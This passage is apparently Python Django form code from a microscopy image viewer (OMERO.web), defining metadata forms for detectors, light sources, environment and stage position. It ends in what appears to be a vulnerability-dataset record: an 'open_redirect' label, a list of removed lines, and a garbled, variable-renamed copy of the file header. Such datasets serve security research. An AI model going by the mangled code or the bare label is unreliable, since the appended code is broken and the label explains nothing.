set_widget_attrs(self.fields["cutOutTolerance"])
except Exception:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut out tolerance",
required=False,
)
set_widget_attrs(self.fields["cutOutTolerance"])
# Transmittance
try:
if kwargs["initial"]["filter"].transmittanceRange is not None:
self.fields["transmittance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "transmittance"
),
}
),
initial=formatPercentFraction(
kwargs["initial"]["filter"]
.getTransmittanceRange()
.transmittance
),
label="Transmittance (%)",
required=False,
)
else:
self.fields["transmittance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "transmittance"
),
}
),
required=False,
)
set_widget_attrs(self.fields["transmittance"])
except Exception:
self.fields["transmittance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["transmittance"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
"filterWheel",
"cutIn",
"cutOut",
"cutInTolerance",
"cutOutTolerance",
"transmittance",
]
class MetadataDetectorForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataDetectorForm, self).__init__(*args, **kwargs)
detSet = kwargs["initial"]["detectorSettings"]
detector = kwargs["initial"]["detector"]
# Manufacturer
try:
if detector is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "manufacturer"),
}
),
initial=detector.manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "manufacturer"),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Model
try:
if detector is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "model"),
}
),
initial=detector.model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "model"),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# SN
try:
if detector is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "serialNumber"),
}
),
initial=detector.serialNumber,
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "serialNumber"),
}
),
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot number (NB. Untill OMERO model is updated in 4.3, this will
# throw since lotNumber is not yet supported)
try:
if detector is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "lotNumber"),
}
),
initial=detector.lotNumber,
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "lotNumber"),
}
),
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
# Type
try:
if detector.getDetectorType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(detector.id, "type", options=True)
}
),
initial=detector.getDetectorType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(detector.id, "type", options=True)
}
),
required=False,
)
set_widget_attrs(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["type"])
# Gain
try:
if detSet is not None:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": save_metadata(detSet.id, "gain")}
),
initial=detSet.gain,
required=False,
)
elif detector is not None:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "gain"),
}
),
initial=detector.gain,
required=False,
)
else:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": save_metadata(detSet.id, "gain")}
),
required=False,
)
set_widget_attrs(self.fields["gain"])
except Exception:
self.fields["gain"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["gain"])
# Voltage
try:
if detSet is not None and detSet.voltage is not None:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detSet.id, "voltage"),
}
),
initial=detSet.voltage.getValue(),
label="Voltage (%s)" % detSet.voltage.getSymbol(),
required=False,
)
elif detector is not None:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "voltage"),
}
),
initial=detector.voltage.getValue(),
label="Voltage (%s)" % detector.voltage.getSymbol(),
required=False,
)
else:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detSet.id, "voltage"),
}
),
required=False,
)
set_widget_attrs(self.fields["voltage"])
except Exception:
self.fields["voltage"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["voltage"])
# Offset
try:
if detSet is not None:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detSet.id, "offsetValue"),
}
),
initial=detSet.offsetValue,
label="Offset",
required=False,
)
elif detector is not None:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "offsetValue"),
}
),
initial=detector.offsetValue,
label="Offset",
required=False,
)
else:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "offsetValue"),
}
),
label="Offset",
required=False,
)
set_widget_attrs(self.fields["offsetValue"])
except Exception:
self.fields["offsetValue"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Offset",
required=False,
)
set_widget_attrs(self.fields["offsetValue"])
# Zoom
try:
if detector is not None:
self.fields["zoom"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "voltage"),
}
),
initial=detector.zoom,
required=False,
)
else:
self.fields["zoom"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "voltage"),
}
),
required=False,
)
set_widget_attrs(self.fields["zoom"])
except Exception:
self.fields["zoom"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["zoom"])
# Amplification gain
try:
if detector is not None:
self.fields["amplificationGain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "amplificationGain"),
}
),
initial=detector.amplificationGain,
label="Amplification gain",
required=False,
)
else:
self.fields["amplificationGain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "amplificationGain"),
}
),
label="Amplification gain",
required=False,
)
set_widget_attrs(self.fields["amplificationGain"])
except Exception:
self.fields["amplificationGain"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Amplification gain",
required=False,
)
set_widget_attrs(self.fields["amplificationGain"])
# Read out rate
try:
if detSet is not None and detSet.readOutRate is not None:
self.fields["readOutRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detSet.id, "readOutRate"),
}
),
initial=detSet.readOutRate.getValue(),
label=("Read out rate (%s)" % detSet.readOutRate.getSymbol()),
required=False,
)
else:
self.fields["readOutRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detSet.id, "readOutRate"),
}
),
label="Read out rate",
required=False,
)
set_widget_attrs(self.fields["readOutRate"])
except Exception:
self.fields["readOutRate"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Read out rate",
required=False,
)
set_widget_attrs(self.fields["readOutRate"])
# Binning
try:
if detSet is not None:
self.fields["binning"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["binnings"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(detSet.id, "type", options=True)
}
),
initial=detSet.getBinning().value,
required=False,
)
else:
self.fields["binning"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["binnings"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(detSet.id, "type", options=True)
}
),
required=False,
)
set_widget_attrs(self.fields["binning"])
except Exception:
self.fields["binning"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["binning"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
"gain",
"voltage",
"offsetValue",
"zoom",
"amplificationGain",
"readOutRate",
"binning",
]
class MetadataLightSourceForm(forms.Form):
BOOLEAN_CHOICES = (
("", "---------"),
("True", "True"),
("False", "False"),
)
def __init__(self, *args, **kwargs):
super(MetadataLightSourceForm, self).__init__(*args, **kwargs)
lightSource = kwargs["initial"]["lightSource"]
lightSourceSettings = None
if "lightSourceSettings" in kwargs["initial"]:
lightSourceSettings = kwargs["initial"]["lightSourceSettings"]
self.lightSourceType = lightSource.OMERO_CLASS
# Manufacturer
try:
if lightSource.manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "model"),
}
),
initial=lightSource.manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "model"),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Model
try:
if lightSource.model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "model"),
}
),
initial=lightSource.model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "model"),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# Serial Number
try:
if lightSource.serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "serialNumber"),
}
),
initial=lightSource.serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "serialNumber"),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot Number
try:
if lightSource.lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "lotNumber"),
}
),
initial=lightSource.lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "lotNumber"),
}
),
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
# Power
try:
if lightSource.power is not None:
self.fields["power"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "power"),
}
),
initial=lightSource.power.getValue(),
label="Power (%s)" % lightSource.power.getSymbol(),
required=False,
)
else:
self.fields["power"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "power"),
}
),
required=False,
)
set_widget_attrs(self.fields["power"])
except Exception:
self.fields["power"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["power"])
# Type
try:
if lightSource.getLightSourceType() is not None:
self.fields["lstype"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["lstypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "type", options=True
)
}
),
label="Type",
initial=lightSource.getLightSourceType().value,
required=False,
)
else:
self.fields["lstype"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["lstypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "type", options=True
)
}
),
label="Type",
required=False,
)
set_widget_attrs(self.fields["lstype"])
except Exception:
self.fields["lstype"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Type",
required=False,
)
set_widget_attrs(self.fields["lstype"])
# Pump (laser only)
try:
# Will throw exception for non-Laser lightsources.
pump = lightSource.getPump()
pumpType = pump.OMERO_CLASS # E.g. 'Arc'
pumpModel = pump.getModel()
pumpValue = "%s: %s" % (pumpType, pumpModel)
self.fields["pump"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial=pumpValue,
required=False,
)
except Exception:
# Not a Laser - don't show Pump
self.fields["pump"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["pump"])
# Medium
try:
if lightSource.getLaserMedium() is not None:
self.fields["lmedium"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "medium", options=True
)
}
),
initial=lightSource.getLaserMedium().value,
label="Medium",
required=False,
)
else:
self.fields["lmedium"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "medium", options=True
)
}
),
label="Medium",
required=False,
)
set_widget_attrs(self.fields["lmedium"])
except Exception:
self.fields["lmedium"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Medium",
required=False,
)
set_widget_attrs(self.fields["lmedium"])
# Wavelength
try:
if (
lightSourceSettings is not None
and lightSourceSettings.wavelength is not None
):
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "wavelength"),
}
),
initial=lightSourceSettings.wavelength.getValue(),
label=(
"Wavelength (%s)" % lightSourceSettings.wavelength.getSymbol()
),
required=False,
)
elif lightSource.wavelength is not None:
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "wavelength"),
}
),
initial=lightSource.wavelength.getValue(),
label=("Wavelength (%s)" % lightSource.wavelength.getSymbol()),
required=False,
)
else:
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "wavelength"),
}
),
required=False,
)
set_widget_attrs(self.fields["wavelength"])
except Exception:
self.fields["wavelength"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["wavelength"])
# FrequencyMultiplication
try:
if lightSource.frequencyMultiplication is not None:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
lightSource.id, "frequencyMultiplication"
),
}
),
initial=lightSource.frequencyMultiplication,
label="Frequency Multiplication",
required=False,
)
else:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
lightSource.id, "frequencyMultiplication"
),
}
),
label="Frequency Multiplication",
required=False,
)
set_widget_attrs(self.fields["frequencyMultiplication"])
except Exception:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Frequency Multiplication",
required=False,
)
set_widget_attrs(self.fields["frequencyMultiplication"])
# Tuneable
try:
if lightSource.tuneable is not None:
self.fields["tuneable"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "tuneable", options=True
)
}
),
initial=lightSource.tuneable,
required=False,
)
else:
self.fields["tuneable"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "tuneable", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["tuneable"])
except Exception:
self.fields["tuneable"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["tuneable"])
# Pulse
try:
if lightSource.pulse is not None:
self.fields["pulse"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["pulses"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "pulse", options=True
)
}
),
initial=lightSource.pulse,
required=False,
)
else:
self.fields["pulse"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["pulses"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "pulse", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["pulse"])
except Exception:
self.fields["pulse"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["pulse"])
# Repetition Rate
try:
if lightSource.repetitionRate is not None:
self.fields["repetitionRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "repetitionRate"),
}
),
initial=lightSource.repetitionRate.getValue(),
label=(
"Repetition rate (%s)" % lightSource.repetitionRate.getSymbol()
),
required=False,
)
else:
self.fields["repetitionRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "repetitionRate"),
}
),
label="Repetition rate",
required=False,
)
set_widget_attrs(self.fields["repetitionRate"])
except Exception:
self.fields["repetitionRate"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Repetition rate",
required=False,
)
set_widget_attrs(self.fields["repetitionRate"])
# Pockel Cell
try:
if lightSource.pockelCell is not None:
self.fields["pockelCell"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "pockelCell", options=True
)
}
),
initial=lightSource.pockelCell,
label="Pockel Cell",
required=False,
)
else:
self.fields["pockelCell"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "pockelCell", options=True
)
}
),
label="Pockel Cell",
required=False,
)
set_widget_attrs(self.fields["pockelCell"])
except Exception:
self.fields["pockelCell"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pockel Cell",
required=False,
)
set_widget_attrs(self.fields["pockelCell"])
# Attenuation
if (
lightSourceSettings is not None
and lightSourceSettings.attenuation is not None
):
self.fields["attenuation"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
lightSourceSettings.id, "attenuation"
),
}
),
initial=formatPercentFraction(lightSourceSettings.attenuation),
label="Attenuation (%)",
required=False,
)
else:
self.fields["attenuation"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["attenuation"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"power",
"lstype",
"pump",
"lmedium",
"wavelength",
"frequencyMultiplication",
"tuneable",
"pulse",
"repetitionRate",
"pockelCell",
"attenuation",
]
class MetadataEnvironmentForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataEnvironmentForm, self).__init__(*args, **kwargs)
# Imaging environment
imagingEnv = kwargs["initial"]["image"].getImagingEnvironment()
# Temperature
try:
if imagingEnv.temperature is not None:
self.fields["temperature"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "temperature"
),
}
),
initial=imagingEnv.temperature.getValue(),
label=("Temperature (%s)" % imagingEnv.temperature.getSymbol()),
required=False,
)
else:
self.fields["temperature"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "temperature"
),
}
),
required=False,
)
set_widget_attrs(self.fields["temperature"])
except Exception:
self.fields["temperature"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["temperature"])
# Air Pressure
try:
if imagingEnv.airPressure is not None:
self.fields["airPressure"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "airPressure"
),
}
),
initial=imagingEnv.airPressure.getValue(),
label=("Air Pressure (%s)" % imagingEnv.airPressure.getSymbol()),
required=False,
)
else:
self.fields["airPressure"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "airPressure"
),
}
),
label="Air Pressure",
required=False,
)
set_widget_attrs(self.fields["airPressure"])
except Exception:
self.fields["airPressure"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
label="Air Pressure",
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["airPressure"])
# Humidity
try:
if imagingEnv.humidity is not None:
self.fields["humidity"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "humidity"
),
}
),
initial=imagingEnv.humidity,
required=False,
)
else:
self.fields["humidity"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "humidity"
),
}
),
required=False,
)
set_widget_attrs(self.fields["humidity"])
except Exception:
self.fields["humidity"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["humidity"])
# CO2 percent
try:
if imagingEnv.co2percent is not None:
self.fields["co2percent"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "co2percent"
),
}
),
initial=imagingEnv.co2percent,
label="CO2 (%)",
required=False,
)
else:
self.fields["co2percent"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "co2percent"
),
}
),
label="CO2 (%)",
required=False,
)
set_widget_attrs(self.fields["co2percent"])
except Exception:
self.fields["co2percent"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="CO2 (%)",
required=False,
)
set_widget_attrs(self.fields["co2percent"])
self.fields.keyOrder = ["airPressure", "co2percent", "humidity", "temperature"]
class MetadataStageLabelForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataStageLabelForm, self).__init__(*args, **kwargs)
# Stage label
# Position x
try:
if kwargs["initial"]["image"].getStageLabel() is not None:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positionx"
),
}
),
initial=kwargs["initial"]["image"].getStageLabel().positionx,
label="Position X",
required=False,
)
else:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positionx"
),
}
),
label="Position X",
required=False,
)
set_widget_attrs(self.fields["positionx"])
except Exception:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position X",
required=False,
)
set_widget_attrs(self.fields["positionx"])
# Position y
try:
if kwargs["initial"]["image"].getStageLabel() is not None:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positiony"
),
}
),
initial=kwargs["initial"]["image"].getStageLabel().positiony,
label="Position Y",
required=False,
)
else:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positiony"
),
}
),
label="Position Y",
required=False,
)
set_widget_attrs(self.fields["positiony"])
except Exception:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position Y",
required=False,
)
set_widget_attrs(self.fields["positionx"])
# Position z
try:
if kwargs["initial"]["image"].getStageLabel() is not None:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positionz"
),
}
),
initial=kwargs["initial"]["image"].getStageLabel().positionz,
label="Position Z",
required=False,
)
else:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positionz"
),
}
),
label="Position Z",
required=False,
)
set_widget_attrs(self.fields["positionz"])
except Exception:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position Z",
required=False,
)
set_widget_attrs(self.fields["positionz"])
self.fields.keyOrder = ["positionx", "positiony", "positionz"]
| open_redirect | {
"code": [
"from omeroweb.webadmin.custom_forms import GroupModelMultipleChoiceField",
"class BasketShareForm(ShareForm):",
" def __init__(self, *args, **kwargs):",
" super(BasketShareForm, self).__init__(*args, **kwargs)",
" try:",
" self.fields[\"image\"] = GroupModelMultipleChoiceField(",
" queryset=kwargs[\"initial\"][\"images\"],",
" initial=kwargs[\"initial\"][\"selected\"],",
" widget=forms.SelectMultiple(attrs={\"size\": 10}),",
" )",
" except Exception:",
" self.fields[\"image\"] = GroupModelMultipleChoiceField(",
" queryset=kwargs[\"initial\"][\"images\"],",
" widget=forms.SelectMultiple(attrs={\"size\": 10}),",
" )"
],
"line_no": [
40,
130,
131,
132,
134,
135,
136,
137,
138,
139,
140,
141,
142,
143,
144
]
} | {
"code": [],
"line_no": []
} |
import .datetime
import time
import logging
from django.conf import .settings
from django import forms
from django.forms.formsets import formset_factory
from django.core.urlresolvers import reverse
from omeroweb.custom_forms import NonASCIIForm
from .custom_forms import MetadataModelChoiceField
from .custom_forms import AnnotationModelMultipleChoiceField
from .custom_forms import ObjectModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import ExperimenterModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import GroupModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import GroupModelChoiceField
from omeroweb.webclient.webclient_utils import formatPercentFraction
VAR_0 = logging.getLogger(__name__)
VAR_1 = "%swebgateway/img/help16.png" % settings.STATIC_URL
VAR_2 = (
'<span class="tooltip" title="Enable/Disable: This option'
' allows the VAR_17 to keep the access control of the share.">'
'<img src="%s" /></span>'
) % VAR_1
VAR_3 = (
'<span class="tooltip" title="Expiry VAR_49: This VAR_49 defines'
" when the share will stop being available. Date format:"
